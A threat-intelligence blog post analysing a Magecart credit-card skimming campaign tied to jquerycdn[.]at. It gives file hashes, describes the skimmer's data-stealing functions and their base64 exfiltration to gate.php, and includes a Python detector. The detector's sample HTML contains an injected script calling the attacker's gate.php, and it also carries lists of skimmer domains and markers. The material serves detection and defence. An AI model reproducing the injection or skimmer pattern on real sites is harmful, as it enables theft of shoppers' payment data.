Analysis of a recent Magecart campaign

On March 13, SanSec revealed a new Magecart domain used to host malicious JavaScript (.js) files designed to capture credit card details from e-commerce checkout pages. The domain (jquerycdn[.]at) hosted these scripts across at least 299 different victim stores. The Magento 1 e-commerce platform was the most frequently targeted, and it’s important to note that support for Magento 1 ended on June 30, 2020, meaning it no longer receives security updates.
How does the web skimmer work?

“Web skimmers are loaded on the checkout page of a typical store. It lives in the browser of an unsuspecting online customer. Whenever he or she enters her payment information, the private data is siphoned off to an offshore server. Usually, this data is then sold on the dark web within 2-10 weeks.” – SanSec. 

In this blog, I analysed the JavaScript Skimmers connected to jquerycdn[.]at in an ongoing campaign: 

knockout-fast-foreach.js
hash: 46fa357596e58272e6e2865c8b80bb96eb910c577267ce64bcada714c8eefdff

jquery.storageapi.min.js
hash: 20ef8044ce87142087cc996cf38c9476df5a95211a9aa03982bd2f17b789de62
(Sites loading this copy of jquery.storageapi.min.js can be found with a URLscan search for the filename.)

jquery.bah-hashchange.min.js
hash: 082aa05bdc4869e4c7d40046c0a3ce7861fbfa89356ff714f1514a8e6775e460
(Sites loading this copy of jquery.bah-hashchange.min.js can be found with a URLscan search for the filename.)

These JavaScript skimmers use a function named ‘GetCCInfo’ to collect the online shopper’s credit card number, CVV, cardholder first and last name, and expiration date. A second function, ‘SaveParam’, collects the first name, last name, home address, and telephone number. All captured data is then base64-encoded and exfiltrated to jquerycdn[.]at/gate.php.
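As an added example (not code from this post or from SanSec), a small Python checker built on the indicators above: it flags checkout-page script tags loaded from the skimmer domains or carrying the lookalike library filenames while served off-site, and hunts captured requests for the base64 POST to gate.php. The sample page, the request body, the hosts shop.example and cdn.example, and the assumption that the POST body is a bare base64 blob are all constructed here.

```python
import base64
import re
from urllib.parse import urlparse

# Indicators quoted from the post, with the [.] defanging removed so they match real hostnames
SKIMMER_DOMAINS = {"jquerycdn.at", "jquerye.at"}
SKIMMER_FILENAMES = {"knockout-fast-foreach.js", "jquery.storageapi.min.js",
                     "jquery.bah-hashchange.min.js"}
SKIMMER_MARKERS = ("GetCCInfo", "SaveParam", "gate.php")
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.I)
INLINE_SCRIPT_RE = re.compile(r'<script(?![^>]*\ssrc=)[^>]*>(.*?)</script>', re.I | re.S)
PAN_RE = re.compile(r'\b\d{13,19}\b')  # crude card-number shape, good enough for hunting

def scan_checkout_html(html, first_party_hosts):
    """Return (reason, evidence) findings for script tags matching the campaign's indicators."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = (urlparse(src).hostname or "").lower()
        filename = urlparse(src).path.rsplit("/", 1)[-1]
        if host in SKIMMER_DOMAINS:
            findings.append(("script from known skimmer domain", src))
        elif filename in SKIMMER_FILENAMES and host and host not in first_party_hosts:
            # the real libraries carry these names too, so only off-site copies are suspicious
            findings.append(("lookalike library loaded off-site", src))
    for body in INLINE_SCRIPT_RE.findall(html):
        hits = [m for m in SKIMMER_MARKERS if m in body]
        if hits:
            findings.append(("inline script with skimmer markers", ",".join(hits)))
    return findings

def flag_exfil_request(method, url, body):
    """Return a reason if a captured request matches the base64-to-gate.php exfil pattern, else None."""
    parsed = urlparse(url)
    if (parsed.hostname or "").lower() in SKIMMER_DOMAINS:
        return "request to known skimmer domain"
    if method.upper() != "POST" or not parsed.path.endswith("/gate.php"):
        return None
    try:  # the skimmer sends the harvested fields as one base64 blob (assumed raw, not form-wrapped)
        decoded = base64.b64decode(body, validate=True).decode("utf-8", "replace")
    except ValueError:
        return None
    if PAN_RE.search(decoded):
        return "base64 POST to gate.php carrying a card-number-like value"
    return None

# Constructed sample page and request body, not captures from a real store
SAMPLE_HTML = """<script src="https://shop.example/js/jquery.storageapi.min.js"></script>
<script src="https://jquerycdn.at/jquery.bah-hashchange.min.js"></script>
<script>function GetCCInfo(){} /* ... */ fetch("https://jquerycdn.at/gate.php")</script>"""
SAMPLE_BODY = base64.b64encode(b"cc=4111111111111111&cvv=123&name=Jane Doe").decode()
```

Running scan_checkout_html(SAMPLE_HTML, {"shop.example"}) leaves the first-party copy of jquery.storageapi.min.js alone and reports the two injected tags.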

Although this campaign was detected back in March 2020, the site remains online and is hosted in AS47510 [Crex Fex Pex ISS, RU]. The JS skimmer also still appears to be injected into e-commerce sites’ checkout pages.

Indicators of Compromise (IOCs):

References: 

https://sansec.io/malware/jquerycdn.at

https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020